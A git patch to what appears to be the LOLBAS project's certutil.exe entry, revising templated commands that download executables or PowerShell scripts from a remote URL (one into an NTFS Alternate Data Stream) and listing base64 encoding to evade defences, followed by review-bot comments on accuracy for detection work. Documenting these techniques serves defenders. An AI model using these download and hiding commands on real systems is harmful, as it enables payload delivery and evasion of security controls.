From d5ce81d2c8485bfa2240401a7118e777860256ff Mon Sep 17 00:00:00 2001 From: LocalLoopBack <38758896+Snausage0x45@users.noreply.github.com> Date: Mon, 26 May 2025 13:16:10 -0700 Subject: [PATCH] Update Certutil.yml with new flag and update previous flag (#402) --- yml/OSBinaries/Certutil.yml | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 3dc75b1..916762c 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml 
@@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save executable to disk in the current folder. + - Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save an executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save executable to disk in the current folder. + - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt - Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + - Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt + Description: Download and save a .ps1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: certutil.exe -URL {REMOTEURL:.exe} + Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash]. 
+ Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + Tags: + - Application: GUI - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures @@ -65,6 +74,7 @@ Resources: - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/egre55/status/1087685529016193025 + - Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/ Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' @@ -73,3 +83,7 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar + - Person: Adam + Handle: '@hexacorn' + - Person: SomeTestLeper + Handle: '@SomeTestLeper'
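Review bot: In the first hunk, the reason for dropping `-split` from the three existing `-urlcache`/`-verifyctl` commands is not recorded anywhere in the entry or the commit message, so a detection engineer reading the file cannot tell whether the old form still works or was simply redundant; please add a sentence to the commit message (or a `Resources` link) explaining the change. Two smaller points in the same hunk: the new `-URL` entry lists `OperatingSystem: Windows 10, Windows 11` while every sibling entry covers Vista through 11, which reads as a deliberate narrowing and should say why (the Hexacorn post only tested on newer builds?); and the cache path `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash]` relies on case-insensitive concatenation to reach `AppData\LocalLow`, so spelling it `%LOCALAPPDATA%Low\...` (or `%USERPROFILE%\AppData\LocalLow\...`) would be clearer for anyone building a file-path detection from it.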
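Review bot: The single link added in the second hunk supports the new `-URL` GUI entry but not the flag changes to the existing three commands; if the `-split` removal was based on a test or a write-up, cite it here alongside the Hexacorn post so each command in the file stays traceable to a source.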
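Review bot: In the third hunk, `- Person: Adam` with `Handle: '@hexacorn'` breaks the file's own convention, where `Person` carries a full name (`Matt Graeber`, `Lior Adar`) or the handle itself (`egre55`); a bare first name is ambiguous in a list of acknowledgements, so either use the fuller form the rest of the file uses or repeat the handle as the `Person` value as the `egre55` entry does. The `SomeTestLeper` entry already follows the latter pattern.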